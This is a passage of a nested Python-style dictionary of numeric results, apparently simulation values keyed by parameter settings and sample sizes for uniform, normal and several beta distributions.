0.24003491428852153, 'beta2': 0.4621704086743315, 'beta4': 0.19345184620978545}, 200: {'uni': 0.24008858690578336, 'nor': 0.30561704025672465, 'beta1': 0.2411289063793809, 'beta2': 0.38799140893024225, 'beta4': 0.20430036700083373}, 150: {'uni': 0.2402127113334836, 'nor': 0.29359145762455585, 'beta1': 0.24097953145287435, 'beta2': 0.35422332515291893, 'beta4': 0.21168379467345955}, 100: {'uni': 0.24266553946279426, 'nor': 0.2764289867601266, 'beta1': 0.23940472376646318, 'beta2': 0.3109340118793721, 'beta4': 
0.22327921524434563}, 75: {'uni': 0.24228255563926224, 'nor': 0.2684971154591404, 'beta1': 0.24478704183107347, 'beta2': 0.2904293862430301, 'beta4': 0.2222914607306522}, 50: {'uni': 0.24336271099583262, 'nor': 0.2573476188536372, 'beta1': 0.23890548191925962, 'beta2': 0.2784552417268729, 'beta4': 0.22861542581896685}, 30: {'uni': 0.24204605571751606, 'nor': 0.25108561658127865, 'beta1': 0.24555355114900856, 'beta2': 0.2627389376158154, 'beta4': 0.23170001504553606}, 20: {'uni': 0.24073537437234863, 'nor': 0.2470271721892606, 'beta1': 0.2464463166884145, 'beta2': 0.25549256236330153, 'beta4': 0.24037869393451103}, 10: {'uni': 0.24247329417887659, 'nor': 0.2441965770243582, 'beta1': 0.24103184940811473, 'beta2': 0.2520935857785229, 'beta4': 0.23862365558069581}}, 400: {1000: {'uni': 0.24211427327472068, 'nor': 0.676319267340814, 'beta1': 0.24108390834726123, 'beta2': 1.1690252804190693, 'beta4': 0.15078182161253156}, 750: {'uni': 0.24267791300187727, 'nor': 0.5501413249911372, 'beta1': 0.242775031630821, 'beta2': 0.897697338268199, 'beta4': 0.15869834269819497}, 500: {'uni': 0.24145820022964667, 'nor': 0.4521520593828404, 'beta1': 0.2418804659547599, 'beta2': 0.6550622764615105, 'beta4': 0.16977219676395533}, 400: {'uni': 0.23821559225819358, 'nor': 0.4102458629344209, 'beta1': 0.23743320963502837, 'beta2': 0.5687082029198804, 'beta4': 0.17623787502407762}, 300: {'uni': 0.23986191363478224, 'nor': 0.36396123975400607, 'beta1': 0.24081073282914195, 'beta2': 0.4752804571225306, 'beta4': 0.18821500754467457}, 200: {'uni': 0.24029454257379748, 'nor': 0.3223034871436207, 'beta1': 0.2399555016919217, 'beta2': 0.41519656419281536, 'beta4': 0.19773039648651466}, 150: {'uni': 0.24112635756275794, 'nor': 0.3034935016307265, 'beta1': 0.2435734602722558, 'beta2': 0.36533428802282, 'beta4': 0.20514348419020711}, 100: {'uni': 0.23780523639691478, 'nor': 0.2831084401784451, 'beta1': 0.23747175043173488, 'beta2': 0.31735429345053373, 'beta4': 0.21660212309631313}, 75: {'uni': 
0.2418157552287163, 'nor': 0.26979755399473915, 'beta1': 0.24058627879036779, 'beta2': 0.3005365712461821, 'beta4': 0.21980198569077422}, 50: {'uni': 0.24415674401788423, 'nor': 0.25836745432753955, 'beta1': 0.23928001830324636, 'beta2': 0.27485770957941486, 'beta4': 0.22835111909074343}, 30: {'uni': 0.24609118802801827, 'nor': 0.2534347434770235, 'beta1': 0.23925830272224197, 'beta2': 0.2638635206820125, 'beta4': 0.22976503900007766}, 20: {'uni': 0.23922321624939863, 'nor': 0.24850008485696506, 'beta1': 0.24063011653162658, 'beta2': 0.2552606058417734, 'beta4': 0.23485042539952278}, 10: {'uni': 0.24240830716178507, 'nor': 0.24239798495104373, 'beta1': 0.23901416919802654, 'beta2': 0.252340339870926, 'beta4': 0.23662410365477324}}, 300: {1000: {'uni': 0.243053898871161, 'nor': 0.8232114454294339, 'beta1': 0.24213327571940335, 'beta2': 1.2649793578697028, 'beta4': 0.1434865846334235}, 750: {'uni': 0.24277697138409443, 'nor': 0.671128181328664, 'beta1': 0.2382122025024967, 'beta2': 0.9610201013925472, 'beta4': 0.15099442381409264}, 500: {'uni': 0.2415441903390995, 'nor': 0.5239011024630138, 'beta1': 0.24085249976123604, 'beta2': 0.7160923462546679, 'beta4': 0.16032455575028098}, 400: {'uni': 0.24090473568312606, 'nor': 0.4589917188298054, 'beta1': 0.2401089340456763, 'beta2': 0.6134753236562074, 'beta4': 0.16832475453109194}, 300: {'uni': 0.24176994785336725, 'nor': 0.4131159780152836, 'beta1': 0.23737268022389493, 'beta2': 0.5633941361756649, 'beta4': 0.17658015943691016}, 200: {'uni': 0.23828816545809994, 'nor': 0.3487354251401745, 'beta1': 0.2429355648970097, 'beta2': 0.43986284067280296, 'beta4': 0.190705297281293}, 150: {'uni': 0.24255538533158844, 'nor': 0.32509313749389934, 'beta1': 0.2389950310201909, 'beta2': 0.38991759246533064, 'beta4': 0.19629155163725026}, 100: {'uni': 0.24095331519349314, 'nor': 0.2963437976654876, 'beta1': 0.23965188272123855, 'beta2': 0.33545367591531955, 'beta4': 0.21099104990350545}, 75: {'uni': 0.24221950168410636, 'nor': 
0.28546070154906056, 'beta1': 0.2429247640798027, 'beta2': 0.3160255362155384, 'beta4': 0.21049215049193679}, 50: {'uni': 0.24069007546929116, 'nor': 0.26907721641204213, 'beta1': 0.24312415693432637, 'beta2': 0.2909340446638638, 'beta4': 0.22154246200364566}, 30: {'uni': 0.23923154893167575, 'nor': 0.2622736680244658, 'beta1': 0.2400516003722522, 'beta2': 0.2665968226643333, 'beta4': 0.2323366436504289}, 20: {'uni': 0.24138941949164475, 'nor': 0.2551655584694042, 'beta1': 0.24213498137771242, 'beta2': 0.2584842482144281, 'beta4': 0.23566993903051417}, 10: {'uni': 0.2432209669937062, 'nor': 0.25283907350595836, 'beta1': 0.2431742501646928, 'beta2': 0.25078409064276774, 'beta4': 0.23529627943263173}}, 200: {1000: {'uni': 0.24499660366604434, 'nor': 1.097639817869575, 'beta1': 0.23911455181052824, 'beta2': 1.4649285026997207, 'beta4': 0.1359651395598983}, 750: {'uni': 0.24199851808800438, 'nor': 0.887824725825296, 'beta1': 0.2413967087754142, 'beta2': 1.1334345439634328, 'beta4': 0.14047516993915654}, 500: {'uni': 0.24014075287593903, 'nor': 0.6594000341543945, 'beta1': 0.24036435405117293, 'beta2': 0.8216125007394981, 'beta4': 0.14849218268167758}, 400: {'uni': 0.24106960987934098, 'nor': 0.5689946627658751, 'beta1': 0.24110128297972788, 'beta2': 0.771591571279977, 'beta4': 0.1543868467871832}, 300: {'uni': 0.23882273709350196, 'nor': 0.4942731879466135, 'beta1': 0.24011478876050937, 'beta2': 0.6245393310482865, 'beta4': 0.16399101088173093}, 200: {'uni': 0.24033816531081775, 'nor': 0.4032448186638761, 'beta1': 0.2399443452121945, 'beta2': 0.49293684523390047, 'beta4': 0.17527446161393567}, 150: {'uni': 0.2428018327342402, 'nor': 0.3669217193782184, 'beta1': 0.24180877006068127, 'beta2': 0.43756548053840366, 'beta4': 0.18593075843293286}, 100: {'uni': 0.24262619876046118, 'nor': 0.3259239792998355, 'beta1': 0.24152719536498482, 'beta2': 0.3596422376502065, 'beta4': 0.19880936168442362}, 75: {'uni': 0.23859171703363893, 'nor': 0.30398225973573706, 'beta1': 
0.24424518838550163, 'beta2': 0.3266938110622517, 'beta4': 0.2056364855121014}, 50: {'uni': 0.24102915503645037, 'nor': 0.2812082623352389, 'beta1': 0.23754445909573635, 'beta2': 0.2988380192608764, 'beta4': 0.21540966947026327}, 30: {'uni': 0.2402253812885772, 'nor': 0.2666026471184283, 'beta1': 0.238929898071989, 'beta2': 0.2770974742803761, 'beta4': 0.22610654163969296}, 20: {'uni': 0.24434570435380387, 'nor': 0.2585112146540725, 'beta1': 0.2415807147279158, 'beta2': 0.2606342573619894, 'beta4': 0.2305235355150038}, 10: {'uni': 0.23918493863914453, 'nor': 0.2509286566547784, 'beta1': 0.23933002800193567, 'beta2': 0.2500227362262458, 'beta4': 0.23670716858488702}}, 150: {1000: {'uni': 0.2480258537942248, 'nor': 1.3567928708960895, 'beta1': 0.24224804232432381, 'beta2': 1.6175890623628855, 'beta4': 0.13045756918703702}, 750: {'uni': 0.24465195063462994, 'nor': 1.1068928812494132, 'beta1': 0.2390436777424845, 'beta2': 1.2607007883259005, 'beta4': 0.1347810736042871}, 500: {'uni': 0.24355017278923838, 'nor': 0.8046287611337243, 'beta1': 0.23962944961533086, 'beta2': 1.0101784924140815, 'beta4': 0.1422529745324236}, 400: {'uni': 0.24311042262969, 'nor': 0.7001338423910112, 'beta1': 0.23781604544465967, 'beta2': 0.8503161974117437, 'beta4': 0.14755128201516188}, 300: {'uni': 0.23886975355360363, 'nor': 0.5799765440309484, 'beta1': 0.2439218469056476, 'beta2': 0.6752562646617146, 'beta4': 0.15560177975408335}, 200: {'uni': 0.23888626458857498, 'nor': 0.4649258351555267, 'beta1': 0.24029027385551024, 'beta2': 0.5570408390062839, 'beta4': 0.16698610009308248}, 150: {'uni': 0.24015716652317576, 'nor': 0.40765528245071664, 'beta1': 0.23978600175962048, 'beta2': 0.45441342190878464, 'beta4': 0.17750135956708718}, 100: {'uni': 0.23976629904286179, 'nor': 0.36342662382072144, 'beta1': 0.2405050450846459, 'beta2': 0.3842744497088235, 'beta4': 0.18785584249443293}, 75: {'uni': 0.2389356283416334, 'nor': 0.32259624193686903, 'beta1': 0.24191287354440572, 'beta2': 
0.3467847590799506, 'beta4': 0.1980570402582252}, 50: {'uni': 0.2408638125003841, 'nor': 0.3042380864153837, 'beta1': 0.24040578066044851, 'beta2': 0.3104369462054549, 'beta4': 0.21064017543128524}, 30: {'uni': 0.2394197058224903, 'nor': 0.27555092176119034, 'beta1': 0.24086168161634688, 'beta2': 0.27796026990059064, 'beta4': 0.21692547003483736}, 20: {'uni': 0.24100489267090433, 'nor': 0.26122745551100984, 'beta1': 0.24157057222993414, 'beta2': 0.2668195198530569, 'beta4': 0.2260832537423928}, 10: {'uni': 0.24014954228965793, 'nor': 0.2557788376305037, 'beta1': 0.2403141724564668, 'beta2': 0.2530659083959061, 'beta4': 0.23335177534081086}}, 100: {1000: {'uni': 0.2605919350905233, 'nor': 1.9645624961106296, 'beta1': 0.23984751915564548, 'beta2': 1.8359008724440415, 'beta4': 0.12666464013310433}, 750: {'uni': 0.24878101533631714, 'nor': 1.5348351031851004, 'beta1': 0.24575841302133908, 'beta2': 1.4410150363381768, 'beta4': 0.13064476822715007}, 500: {'uni': 0.24897645116581815, 'nor': 1.0962913335951492, 'beta1': 0.2400935196361046, 'beta2': 1.139636254314367, 'beta4': 0.135551392373918}, 400: {'uni': 0.24719017310896974, 'nor': 0.9450762377875365, 'beta1': 0.2419823823777533, 'beta2': 0.9364751942900571, 'beta4': 0.13774817173610815}, 300: {'uni': 0.24372613070313465, 'nor': 0.7468683361456988, 'beta1': 0.2450582119509388, 'beta2': 0.753557984795017, 'beta4': 0.1447467889754068}, 200: {'uni': 0.2423349982205343, 'nor': 0.5847266279550053, 'beta1': 0.24278399441600393, 'beta2': 0.5942522950060437, 'beta4': 0.15499143884888605}, 150: {'uni': 0.23787954259994942, 'nor': 0.4961451844254886, 'beta1': 0.24362883398497165, 'beta2': 0.5160693053381106, 'beta4': 0.16281905563956578}, 100: {'uni': 0.2431276940551797, 'nor': 0.4086264133449593, 'beta1': 0.23951870411248702, 'beta2': 0.42597352884781375, 'beta4': 0.17677640465192448}, 75: {'uni': 0.23940536757528075, 'nor': 0.3615361183482404, 'beta1': 0.24118088240667318, 'beta2': 0.36478826184276736, 'beta4': 
0.1859747021402646}, 50: {'uni': 0.2405321018985597, 'nor': 0.329417829885632, 'beta1': 0.23957898862480795, 'beta2': 0.33255958442071576, 'beta4': 0.19727370515804576}, 30: {'uni': 0.23802803232550665, 'nor': 0.2911149045384273, 'beta1': 0.24333835231642956, 'beta2': 0.2942912241872173, 'beta4': 0.21471628209925814}, 20: {'uni': 0.24141040151777965, 'nor': 0.27732114436367966, 'beta1': 0.24448271505810568, 'beta2': 0.27548856384185805, 'beta4': 0.22047328843008912}, 10: {'uni': 0.2395288532777793, 'nor': 0.25755653747120716, 'beta1': 0.24124009172541977, 'beta2': 0.2548693880806449, 'beta4': 0.2324567144844881}}, 75: {1000: {'uni': 0.2733620041631347, 'nor': 2.5407750263082485, 'beta1': 0.24220653292966504, 'beta2': 1.992313644576726, 'beta4': 0.12253684375736348}, 750: {'uni': 0.2652633553834021, 'nor': 1.921891394256636, 'beta1': 0.23914114635669345, 'beta2': 1.5518115385392717, 'beta4': 0.1256010750231391}, 500: {'uni': 0.2527254324730338, 'nor': 1.378831469746027, 'beta1': 0.24130850311200625, 'beta2': 1.197978006428742, 'beta4': 0.12999795860072655}, 400: {'uni': 0.24984697930169772, 'nor': 1.1613920565872908, 'beta1': 0.24214641743716728, 'beta2': 1.0259603246868627, 'beta4': 0.13486519818983125}, 300: {'uni': 0.2479963230662672, 'nor': 0.9231830439530876, 'beta1': 0.23832883927011117, 'beta2': 0.8854954020037991, 'beta4': 0.13886992475084908}, 200: {'uni': 0.24658425283069435, 'nor': 0.699588699460227, 'beta1': 0.24451554104416093, 'beta2': 0.6628263476389888, 'beta4': 0.14795321820003707}, 150: {'uni': 0.24036354199917276, 'nor': 0.5864620437412704, 'beta1': 0.23953882256474157, 'beta2': 0.54934480302271, 'beta4': 0.15620458279628316}, 100: {'uni': 0.24112317386876864, 'nor': 0.4720377913443705, 'beta1': 0.24454109705882449, 'beta2': 0.4620929610677745, 'beta4': 0.16679016410673922}, 75: {'uni': 0.23732383914340596, 'nor': 0.41438846624049946, 'beta1': 0.2412836743844065, 'beta2': 0.39789224468757356, 'beta4': 0.17713278107583144}, 50: {'uni': 
0.24223937685068417, 'nor': 0.35638224091958604, 'beta1': 0.24030382984083512, 'beta2': 0.3468155717538311, 'beta4': 0.18927041379727919}, 30: {'uni': 0.2395894169045569, 'nor': 0.3096973245205462, 'beta1': 0.2402164331553301, 'beta2': 0.29699896987299107, 'beta4': 0.20300323871340764}, 20: {'uni': 0.23995144013357592, 'nor': 0.28693888172104376, 'beta1': 0.23881996736244296, 'beta2': 0.2789792810138777, 'beta4': 0.21398426243766705}, 10: {'uni': 0.24000000221392964, 'nor': 0.2686733818699048, 'beta1': 0.2420959596038857, 'beta2': 0.257136366090763, 'beta4': 0.22733847650105596}}, 50: {1000: {'uni': 0.3068311615645959, 'nor': 3.6736591202407687, 'beta1': 0.24482062417518038, 'beta2': 2.432092145781782, 'beta4': 0.12064828970911215}, 750: {'uni': 0.28912852505671655, 'nor': 2.831736231456402, 'beta1': 0.24339370076078054, 'beta2': 1.9232694348084622, 'beta4': 0.1223013388277045}, 500: {'uni': 0.27181920986827757, 'nor': 1.9692828663527602, 'beta1': 0.24558635427679554, 'beta2': 1.433268319428308, 'beta4': 0.1258545419831927}, 400: {'uni': 0.26686532731179263, 'nor': 1.6136847454717067, 'beta1': 0.24175825591154568, 'beta2': 1.2103855602059785, 'beta4': 0.12813351522250957}, 300: {'uni': 0.26080218844362724, 'nor': 1.2696291936359931, 'beta1': 0.24241872353648633, 'beta2': 0.9918663896414475, 'beta4': 0.1319777391587158}, 200: {'uni': 0.2526083259566342, 'nor': 0.933984988445101, 'beta1': 0.24158668226525173, 'beta2': 0.748342978794983, 'beta4': 0.13912045456877706}, 150: {'uni': 0.24721418406332438, 'nor': 0.752265446490613, 'beta1': 0.23797019102326195, 'beta2': 0.6327723732666909, 'beta4': 0.14465355399933033}, 100: {'uni': 0.23821559230377304, 'nor': 0.5959169440870556, 'beta1': 0.2402644588651114, 'beta2': 0.5151696891568512, 'beta4': 0.15517987578890874}, 75: {'uni': 0.24197758540193703, 'nor': 0.5012351822131893, 'beta1': 0.2385584615799185, 'beta2': 0.4423371131127513, 'beta4': 0.16250378171522337}, 50: {'uni': 0.23793436068418145, 'nor': 0.41216084348155146, 
'beta1': 0.2449062869215513, 'beta2': 0.3729679962422796, 'beta4': 0.17552753698854456}, 30: {'uni': 0.2377054028390569, 'nor': 0.3398721831056038, 'beta1': 0.2427909293712705, 'beta2': 0.32306879164070423, 'beta4': 0.19187644285737177}, 20: {'uni': 0.23557847890269124, 'nor': 0.3110020923280968, 'beta1': 0.2395482080645361, 'beta2': 0.289342786687756, 'beta4': 0.20294447085260098}, 10: {'uni': 0.23949403398183788, 'nor': 0.2766693034599573, 'beta1': 0.2416512444769793, 'beta2': 0.2618531639699525, 'beta4': 0.22034386617181895}}, 30: {1000: {'uni': 0.43770022218247145, 'nor': 6.045178745535347, 'beta1': 0.259169089035364, 'beta2': 3.1789688468507187, 'beta4': 0.1189705042688022}, 750: {'uni': 0.3841643631759853, 'nor': 4.6933331437812695, 'beta1': 0.25694284971636117, 'beta2': 2.531928932737123, 'beta4': 0.11959939274766435}, 500: {'uni': 0.33214058043942385, 'nor': 3.122276993402984, 'beta1': 0.24725683979626126, 'beta2': 1.7655550798358093, 'beta4': 0.1212221979595647}, 400: {'uni': 0.3113906173398094, 'nor': 2.5706794658103362, 'beta1': 0.2492477327737819, 'beta2': 1.451535391839624, 'beta4': 0.1234228894172553}, 300: {'uni': 0.2893446935826717, 'nor': 2.0156312350698955, 'beta1': 0.24350296180449926, 'beta2': 1.201763851450293, 'beta4': 0.12591000107060388}, 200: {'uni': 0.273392826252959, 'nor': 1.3867110062484225, 'beta1': 0.24053742109476037, 'beta2': 0.9012159293412797, 'beta4': 0.13008575299715588}, 150: {'uni': 0.2640098391867243, 'nor': 1.1192388423172117, 'beta1': 0.24188846756485693, 'beta2': 0.7467375839736665, 'beta4': 0.13384427582455877}, 100: {'uni': 0.25271345398459155, 'nor': 0.8225120209007627, 'beta1': 0.23935935088809498, 'beta2': 0.5842254905275225, 'beta4': 0.1406395827941181}, 75: {'uni': 0.24788291043542154, 'nor': 0.6818298683800723, 'beta1': 0.24226210440493295, 'beta2': 0.503335957714589, 'beta4': 0.14920430843273713}, 50: {'uni': 0.24243844527057135, 'nor': 0.5339967195283021, 'beta1': 0.2373472370616648, 'beta2': 0.4136763534099132, 
'beta4': 0.1594834897970974}, 30: {'uni': 0.23977426044085998, 'nor': 0.40713183447342743, 'beta1': 0.23982470684155024, 'beta2': 0.340373579415394, 'beta4': 0.17496600438379623}, 20: {'uni': 0.23565550978474273, 'nor': 0.35827410322120223, 'beta1': 0.2432582988872901, 'beta2': 0.3028878123522787, 'beta4': 0.18830622296140384}, 10: {'uni': 0.23884244412859004, 'nor': 0.29774554749212095, 'beta1': 0.2429434805995286, 'beta2': 0.27437982722009696, 'beta4': 0.21104469675517187}}, 20: {1000: {'uni': 0.6892754769519168, 'nor': 9.176593622378835, 'beta1': 0.3054951826847113, 'beta2': 4.158533410554479, 'beta4': 0.11844646746439941}, 750: {'uni': 0.5710910368783783, 'nor': 6.85879055020698, 'beta1': 0.291224584817929, 'beta2': 3.3258091577056934, 'beta4': 0.11833379076172601}, 500: {'uni': 0.4490264171861371, 'nor': 4.7388425168137704, 'beta1': 0.2709631964122811, 'beta2': 2.2681127604964746, 'beta4': 0.12091634200893009}, 400: {'uni': 0.40262558544632876, 'nor': 3.7499381178342865, 'beta1': 0.2654247666116526, 'beta2': 1.8935692321733735, 'beta4': 0.12140087563180225}, 300: {'uni': 0.3620101021855284, 'nor': 2.8616884859791774, 'beta1': 0.25914723891983044, 'beta2': 1.486273128641971, 'beta4': 0.12333325025392265}, 200: {'uni': 0.31638143108661526, 'nor': 2.0253546810063368, 'beta1': 0.25051322402716275, 'beta2': 1.0906532820059176, 'beta4': 0.12414596326922459}, 150: {'uni': 0.2932601912449958, 'nor': 1.5701446424813754, 'beta1': 0.2495773997859125, 'beta2': 0.8805733827030208, 'beta4': 0.12850544780237397}, 100: {'uni': 0.2722615156392054, 'nor': 1.134814986920992, 'beta1': 0.243554476948524, 'beta2': 0.6953269837820146, 'beta4': 0.13413712917838938}, 75: {'uni': 0.26123409553509197, 'nor': 0.9185645079205841, 'beta1': 0.24067258854087187, 'beta2': 0.5785524796549206, 'beta4': 0.13768242690559246}, 50: {'uni': 0.2525355140660586, 'nor': 0.6919711376282242, 'beta1': 0.23972453350777076, 'beta2': 0.4621193525410244, 'beta4': 0.14896875998737302}, 30: {'uni': 
0.23699092514081888, 'nor': 0.5142059925503737, 'beta1': 0.24033718948188124, 'beta2': 0.3680441197157298, 'beta4': 0.1610601094304951}, 20: {'uni': 0.2368489537086997, 'nor': 0.41959311120894416, 'beta1': 0.2362577222524531, 'beta2': 0.3210354805279546, 'beta4': 0.1755531728961799}, 10: {'uni': 0.2305135874565801, 'nor': 0.33410673964967214, 'beta1': 0.23977045087805413, 'beta2': 0.2750600950398116, 'beta4': 0.19802118365276158}}, 10: {1000: {'uni': 1.9338996668648218, 'nor': 19.136519606563095, 'beta1': 0.7769604206007231, 'beta2': 7.135018695387052, 'beta4': 0.11672148234838667}, 750: {'uni': 1.503083114158401, 'nor': 14.244166458989907, 'beta1': 0.6245406492874473, 'beta2': 5.485855890374126, 'beta4': 0.11590778540337585}, 500: {'uni': 1.0540269543763192, 'nor': 9.636675903157979, 'beta1': 0.4769109867417122, 'beta2': 3.629626196155065, 'beta4': 0.1183646543268232}, 400: {'uni': 0.8778275527846914, 'nor': 7.683428962543298, 'beta1': 0.4235006921305748, 'beta2': 3.1126286625190698, 'beta4': 0.11969294332215273}, 300: {'uni': 0.7118782458518407, 'nor': 5.858208987207176, 'beta1': 0.3702183338793529, 'beta2': 2.2862080783939276, 'beta4': 0.11904220668366429}, 200: {'uni': 0.5317782007011279, 'nor': 3.8818182676243946, 'beta1': 0.3209894941286431, 'beta2': 1.5812012320642916, 'beta4': 0.12034673949960818}, 150: {'uni': 0.45446323423335977, 'nor': 3.0242125711856995, 'beta1': 0.2934232739269098, 'beta2': 1.2805423857971638, 'beta4': 0.12101602618457948}, 100: {'uni': 0.3725508635970142, 'nor': 2.120209894960073, 'beta1': 0.2710235563443484, 'beta2': 0.9070242917255719, 'beta4': 0.12465509096909932}, 75: {'uni': 0.33099815865895554, 'nor': 1.6693650264528523, 'beta1': 0.26131183836252986, 'beta2': 0.756986585821483, 'beta4': 0.12709622599790013}, 50: {'uni': 0.29398694375602924, 'nor': 1.205885184224821, 'beta1': 0.24971858473676287, 'beta2': 0.5807948967581763, 'beta4': 0.13265854229106566}, 30: {'uni': 0.26585428555308954, 'nor': 0.8178737757159222, 'beta1': 
0.2418697448772308, 'beta2': 0.43669480643723463, 'beta4': 0.14211953887757617}, 20: {'uni': 0.24373877950691725, 'nor': 0.6138785967144306, 'beta1': 0.23342640175778887, 'beta2': 0.36068002883182226, 'beta4': 0.152895376758761}, 10: {'uni': 0.23264013625029636, 'nor': 0.43398578358983597, 'beta1': 0.22974394844926418, 'beta2': 0.29064283196263124, 'beta4': 0.17437119004836585}}}, 0.25: {1000: {1000: {'uni': 0.21098657037380533, 'nor': 0.35166149873456404, 'beta1': 0.20873759868671643, 'beta2': 0.8400951538540714, 'beta4': 0.1568594703186771}, 750: {'uni': 0.21077721252896842, 'nor': 0.3118537438226372, 'beta1': 0.20810169176177157, 'beta2': 0.6154419955912691, 'beta4': 0.1626506015661881}, 500: {'uni': 0.2121717067619794, 'nor': 0.27590570785230367, 'beta1': 0.2097214424172366, 'beta2': 0.43817472674515884, 'beta4': 0.17369850324548264}, 400: {'uni': 0.20802888613437368, 'nor': 0.26338964054208136, 'beta1': 0.2112189750302959, 'beta2': 0.38728535180277673, 'beta4': 0.17861053808286997}, 300: {'uni': 0.21361140102104362, 'nor': 0.24953596598208133, 'beta1': 0.21110518290253538, 'beta2': 0.3282216898198249, 'beta4': 0.18491825048533722}, 200: {'uni': 0.20729973695492088, 'nor': 0.23646891400599884, 'beta1': 0.20777961312417817, 'beta2': 0.2855197842554735, 'beta4': 0.19176746815365306}, 150: {'uni': 0.2095608253801655, 'nor': 0.2306371196887052, 'beta1': 0.20960687523291455, 'beta2': 0.2636115633933207, 'beta4': 0.19773334554066177}, 100: {'uni': 0.21145691141407225, 'nor': 0.22635031334486544, 'beta1': 0.207683026125086, 'beta2': 0.24292859255051902, 'beta4': 0.20134269310222558}, 75: {'uni': 0.20558051369572755, 'nor': 0.21610770490399964, 'beta1': 0.2074046337720713, 'beta2': 0.23277178385060804, 'beta4': 0.1993614439736463}, 50: {'uni': 0.2098521724204996, 'nor': 0.2147126715773342, 'beta1': 0.21166974003626254, 'beta2': 0.22486117495033467, 'beta4': 0.20265654637570651}, 30: {'uni': 0.21172537882212614, 'nor': 0.21638631455788926, 'beta1': 0.20945408468660293, 
'beta2': 0.21870178357399692, 'beta4': 0.20573186312975994}, 20: {'uni': 0.20765899216156328, 'nor': 0.2127196854834208, 'beta1': 0.20989722816174097, 'beta2': 0.21522510154220564, 'beta4': 0.20662730212304828}, 10: {'uni': 0.21324200721363007, 'nor': 0.21458476725098155, 'beta1': 0.21159185053784305, 'beta2': 0.21285942913108694, 'beta4': 0.20769505756945225}}, 750: {1000: {'uni': 0.20869501576743424, 'nor': 0.38956307451420247, 'beta1': 0.20929217837762587, 'beta2': 0.8294859264269948, 'beta4': 0.14827843794917997}, 750: {'uni': 0.21191372347879, 'nor': 0.3476256947224088, 'beta1': 0.2100895194945041, 'beta2': 0.6293056880022027, 'beta4': 0.15614558671553708}, 500: {'uni': 0.20899151314484712, 'nor': 0.3049938966927668, 'beta1': 0.21278455726040738, 'beta2': 0.4517545478635386, 'beta4': 0.16500998800014866}, 400: {'uni': 0.2094061455440297, 'nor': 0.28347980370391473, 'beta1': 0.21066797111669797, 'beta2': 0.3884084809742847, 'beta4': 0.17168736382726482}, 300: {'uni': 0.20916785432371376, 'nor': 0.26801613836270666, 'beta1': 0.20585831925323222, 'beta2': 0.3321029400758897, 'beta4': 0.1786724604421414}, 200: {'uni': 0.2085643081118847, 'nor': 0.2475562529946184, 'beta1': 0.20903879620035365, 'beta2': 0.2939306029876208, 'beta4': 0.18588153828339068}, 150: {'uni': 0.20735477521949924, 'nor': 0.23724909106407047, 'beta1': 0.20908779012385287, 'beta2': 0.273775240862008, 'beta4': 0.19142047852315378}, 100: {'uni': 0.20869783166523406, 'nor': 0.22732909767667214, 'beta1': 0.20933417310193372, 'beta2': 0.24880217826881731, 'beta4': 0.19816157590407354}, 75: {'uni': 0.21039255871863496, 'nor': 0.22185240574552587, 'beta1': 0.20887880701399933, 'beta2': 0.2399960689165522, 'beta4': 0.20281785091945453}, 50: {'uni': 0.21029781920645818, 'nor': 0.21912777348936618, 'beta1': 0.21068267834413842, 'beta2': 0.23167246136886402, 'beta4': 0.20249769600112058}, 30: {'uni': 0.20952942367398258, 'nor': 0.21384193819534977, 'beta1': 0.21131912031339217, 'beta2': 
0.21737064331552444, 'beta4': 0.20575552847814524}, 20: {'uni': 0.20890110085437386, 'nor': 0.2131594319904166, 'beta1': 0.2069034393988381, 'beta2': 0.21768352193128865, 'beta4': 0.2067555030577237}, 10: {'uni': 0.21254200132120335, 'nor': 0.21459786026621233, 'beta1': 0.20943234976185285, 'beta2': 0.21262251673957, 'beta4': 0.20999488209611167}}, 500: {1000: {'uni': 0.2059302858390542, 'nor': 0.49650776830039456, 'beta1': 0.21228903191473655, 'beta2': 0.9152969330737528, 'beta4': 0.1385187931902294}, 750: {'uni': 0.20920355176220426, 'nor': 0.41783563551683944, 'beta1': 0.20926141856456745, 'beta2': 0.7052019038441916, 'beta4': 0.14434793862546202}, 500: {'uni': 0.2151437182196634, 'nor': 0.3435520404521243, 'beta1': 0.20734688138213653, 'beta2': 0.5003830980619229, 'beta4': 0.15713333007243896}, 400: {'uni': 0.21063437135255508, 'nor': 0.31892308057831464, 'beta1': 0.21113940284117513, 'beta2': 0.4412496584112251, 'beta4': 0.16017169484934324}, 300: {'uni': 0.20774895174208088, 'nor': 0.2943930693913531, 'beta1': 0.20808087256826407, 'beta2': 0.37221993303002127, 'beta4': 0.16991539749581303}, 200: {'uni': 0.2114411912598273, 'nor': 0.2623047450364031, 'beta1': 0.20904736920658953, 'beta2': 0.31767722063774184, 'beta4': 0.17919824602785273}, 150: {'uni': 0.20986749913233252, 'nor': 0.24854552809441302, 'beta1': 0.2084663319906776, 'beta2': 0.2975844690768615, 'beta4': 0.18526543867232495}, 100: {'uni': 0.2092594424706574, 'nor': 0.23279372973204007, 'beta1': 0.21211034584787994, 'beta2': 0.2644889198824187, 'beta4': 0.19024613519545072}, 75: {'uni': 0.20844772203737807, 'nor': 0.2290003034992577, 'beta1': 0.20939561863598244, 'beta2': 0.25004310791145395, 'beta4': 0.19675116512816965}, 50: {'uni': 0.2092848896434689, 'nor': 0.22360302358346792, 'beta1': 0.21089442292304225, 'beta2': 0.23526180636184657, 'beta4': 0.1999628539597155}, 30: {'uni': 0.21018248597640826, 'nor': 0.2221002716523805, 'beta1': 0.20856908930100013, 'beta2': 0.22178971202454867, 'beta4': 
0.20140677748683855}, 20: {'uni': 0.21139847384081079, 'nor': 0.21492418220939347, 'beta1': 0.21044560730256473, 'beta2': 0.21755423547583938, 'beta4': 0.2057056915636604}, 10: {'uni': 0.21253820678170735, 'nor': 0.2131854331538128, 'beta1': 0.21275732435191913, 'beta2': 0.21643787131857808, 'beta4': 0.20769941181178414}}, 400: {1000: {'uni': 0.20950261162873524, 'nor': 0.5592207143886676, 'beta1': 0.20822088577391698, 'beta2': 0.9405640273128262, 'beta4': 0.13503805725703802}, 750: {'uni': 0.20840138500109906, 'nor': 0.4650706220967377, 'beta1': 0.20526961258426463, 'beta2': 0.7104148724896289, 'beta4': 0.13947694930523324}, 500: {'uni': 0.20944699177544024, 'nor': 0.3750531448374544, 'beta1': 0.2084873935072584, 'beta2': 0.5124805978381733, 'beta4': 0.150674746212122}, 400: {'uni': 0.21053083340394316, 'nor': 0.34703743831574946, 'beta1': 0.20776791692219637, 'beta2': 0.44807947444895996, 'beta4': 0.15642781061103203}, 300: {'uni': 0.2074453749043504, 'nor': 0.31374511391981097, 'beta1': 0.21042211951567266, 'beta2': 0.38435133093857443, 'beta4': 0.16508578865255383}, 200: 